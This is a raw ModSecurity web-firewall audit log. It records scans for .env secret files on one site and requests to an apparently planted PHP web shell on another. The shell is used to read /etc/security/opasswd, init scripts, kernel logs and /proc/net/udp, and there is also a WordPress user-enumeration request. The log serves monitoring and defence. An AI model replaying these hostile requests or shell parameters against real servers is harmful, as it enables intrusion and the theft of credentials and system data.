X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8e258749-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8e258749-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.arrayz.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env.bak"] [unique_id "aE6pkB_rKu9vEuWYHiZeygAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.arrayz.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.arrayz.com"] [uri "/.env.bak"] [unique_id "aE6pkB_rKu9vEuWYHiZeygAAAAk"] Stopwatch: 1749985680226898 3202 (- - -) Stopwatch2: 1749985680226898 3202; combined=1937, p1=404, p2=1457, p3=0, p4=0, p5=76, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e258749-Z-- --65bb3108-A-- [15/Jun/2025:16:38:00.348125 +0530] aE6pkMZRGs9Zs5Qd_kobfwAAAAA 185.177.72.144 55706 127.0.0.1 7081 --65bb3108-B-- GET /.env.example HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --65bb3108-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --65bb3108-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env.example"] [unique_id "aE6pkMZRGs9Zs5Qd_kobfwAAAAA"] Stopwatch: 1749985680345167 3010 (- - -) Stopwatch2: 1749985680345167 3010; combined=1774, p1=423, p2=1301, p3=0, p4=0, p5=50, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --65bb3108-Z-- --67d79452-A-- [15/Jun/2025:16:38:00.466390 +0530] aE6pkA9BijgXpeeI_r-78AAAAAE 185.177.72.144 55708 127.0.0.1 7081 --67d79452-B-- GET /.env.local HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --67d79452-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --67d79452-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env.local"] [unique_id "aE6pkA9BijgXpeeI_r-78AAAAAE"] Stopwatch: 1749985680463105 3350 (- - -) Stopwatch2: 1749985680463105 3350; combined=1996, p1=399, p2=1525, p3=0, p4=0, p5=72, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --67d79452-Z-- --29227861-A-- [15/Jun/2025:16:38:00.584766 +0530] aE6pkH15LOn2YRwTZIgH7QAAAAc 185.177.72.144 55722 127.0.0.1 7081 --29227861-B-- GET /.env.old HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --29227861-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --29227861-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.arrayz.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env.old"] [unique_id "aE6pkH15LOn2YRwTZIgH7QAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.arrayz.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.arrayz.com"] [uri "/.env.old"] [unique_id "aE6pkH15LOn2YRwTZIgH7QAAAAc"] Stopwatch: 1749985680581553 3267 (- - -) Stopwatch2: 1749985680581553 3267; combined=1951, p1=396, p2=1480, p3=0, p4=0, p5=75, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --29227861-Z-- --2c53c469-A-- [15/Jun/2025:16:38:00.702258 +0530] aE6pkDS8xKUOR1xBR5bmAAAAAAM 185.177.72.144 55748 127.0.0.1 7081 --2c53c469-B-- GET /.env.production HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2c53c469-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --2c53c469-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/.env.production"] [unique_id "aE6pkDS8xKUOR1xBR5bmAAAAAAM"] Stopwatch: 1749985680699504 2808 (- - -) Stopwatch2: 1749985680699504 2808; combined=1678, p1=340, p2=1277, p3=0, p4=0, p5=61, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2c53c469-Z-- --733d1a2e-A-- [15/Jun/2025:16:38:01.170480 +0530] aE6pkcZRGs9Zs5Qd_kobgAAAAAA 185.177.72.144 55806 127.0.0.1 7081 --733d1a2e-B-- GET /app/.env HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --733d1a2e-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --733d1a2e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/app/.env"] [unique_id "aE6pkcZRGs9Zs5Qd_kobgAAAAAA"] Stopwatch: 1749985681167480 3080 (- - -) Stopwatch2: 1749985681167480 3080; combined=1723, p1=377, p2=1269, p3=0, p4=0, p5=77, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --733d1a2e-Z-- --91297b4e-A-- [15/Jun/2025:16:38:02.444044 +0530] aE6pkjS8xKUOR1xBR5bmAgAAAAM 185.177.72.144 55966 127.0.0.1 7081 --91297b4e-B-- GET /laravel/.env HTTP/1.0 Host: www.arrayz.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --91297b4e-F-- HTTP/1.1 404 Not Found Last-Modified: Mon, 30 Sep 2024 04:07:46 GMT ETag: "328-6234e58ee1deb" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --91297b4e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.arrayz.com"] [uri "/laravel/.env"] [unique_id "aE6pkjS8xKUOR1xBR5bmAgAAAAM"] Stopwatch: 1749985682359805 84299 (- - -) Stopwatch2: 1749985682359805 84299; combined=163598, p1=423, p2=1561, p3=0, p4=0, p5=80840, sr=119, sw=1, l=0, gc=80773 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91297b4e-Z-- --3d32ca72-A-- [15/Jun/2025:16:39:28.544325 +0530] aE6p6Dr2XEdSo0rTaLVsUwAAAAg 52.3.127.170 34160 127.0.0.1 7081 --3d32ca72-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/cryptdisks HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.3.127.170 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3d32ca72-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3395 Connection: close Content-Type: text/html; charset=UTF-8 --3d32ca72-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6p6Dr2XEdSo0rTaLVsUwAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/cryptdisks"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6p6Dr2XEdSo0rTaLVsUwAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749985768540413 3963 (- - -) Stopwatch2: 1749985768540413 3963; combined=2127, p1=345, p2=1624, p3=36, p4=40, p5=82, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3d32ca72-Z-- --a4aa4d06-A-- [15/Jun/2025:16:39:32.180073 +0530] aE6p7B_rKu9vEuWYHiZe9QAAAAk 54.162.69.192 45094 127.0.0.1 7081 --a4aa4d06-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/opasswd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.162.69.192 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --a4aa4d06-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2948 Connection: close Content-Type: text/html; charset=UTF-8 --a4aa4d06-H-- Message: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/opasswd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/opasswd found within ARGS:viewfile: /etc/security/opasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6p7B_rKu9vEuWYHiZe9QAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749985772176039 4085 (- - -) Stopwatch2: 1749985772176039 4085; combined=2298, p1=356, p2=1814, p3=36, p4=36, p5=56, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4aa4d06-Z-- --62233238-A-- [15/Jun/2025:16:39:43.735072 +0530] aE6p9x_rKu9vEuWYHiZe-gAAAAk 44.194.139.149 39558 127.0.0.1 7081 --62233238-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/apache-htcacheclean HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.194.139.149 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --62233238-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3968 Connection: close Content-Type: text/html; charset=UTF-8 --62233238-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apache-htcacheclean"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6p9x_rKu9vEuWYHiZe-gAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apache-htcacheclean"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6p9x_rKu9vEuWYHiZe-gAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749985783732205 2926 (- - -) Stopwatch2: 1749985783732205 2926; combined=1477, p1=266, p2=1073, p3=24, p4=38, p5=76, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62233238-Z-- --7633dd66-A-- [15/Jun/2025:16:40:36.012845 +0530] aE6qLGah4jZQMChzmsZ9_AAAAAI 34.236.185.101 55532 127.0.0.1 7081 --7633dd66-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//var/log&viewfile=//var/log/kern.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.236.185.101 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --7633dd66-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2946 Connection: close Content-Type: text/html; charset=UTF-8 --7633dd66-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6qLGah4jZQMChzmsZ9_AAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749985836008132 4784 (- - -) Stopwatch2: 1749985836008132 4784; combined=2596, p1=484, p2=1960, p3=43, p4=41, p5=68, sr=138, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7633dd66-Z-- --4b491b32-A-- [15/Jun/2025:16:42:23.963572 +0530] aE6qlzS8xKUOR1xBR5bmbAAAAAM 98.83.226.125 50946 127.0.0.1 7081 --4b491b32-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/net&viewfile=//proc/net/udp HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.83.226.125 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4b491b32-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3140 Connection: close Content-Type: text/html; charset=UTF-8 --4b491b32-H-- Message: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/net/udp" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/net/udp found within ARGS:viewfile: /proc/net/udp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6qlzS8xKUOR1xBR5bmbAAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749985943959542 4082 (- - -) Stopwatch2: 1749985943959542 4082; combined=2152, p1=354, p2=1678, p3=36, p4=28, p5=56, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b491b32-Z-- --6ac59f5c-A-- [15/Jun/2025:16:43:03.436280 +0530] aE6qvjS8xKUOR1xBR5bmhQAAAAM 165.22.247.248 42752 127.0.0.1 7081 --6ac59f5c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=s2lkunmcg7daf2osgv1us40pmr; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_852c22d3638ec79b58205430a58019%7C%7C1750158778%7C%7C1750155178%7C%7C556b6dd1bc0a8eca1bc0505a650e1474; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=01b8dc29bce440b42842854598827d7e%7C%7C1750158779%7C%7C1750155179%7C%7Cc6da9a0a9b3d5bacfe4b3d35a0b3ee63 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --6ac59f5c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://sarainternational.cstechns.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=01b8dc29bce440b42842854598827d7e%7C%7C1750158779%7C%7C1750155179%7C%7Cc6da9a0a9b3d5bacfe4b3d35a0b3ee63; expires=Tue, 17 Jun 2025 11:12:59 GMT; Max-Age=172796; path=/ Connection: close Content-Type: application/json; charset=UTF-8 --6ac59f5c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag 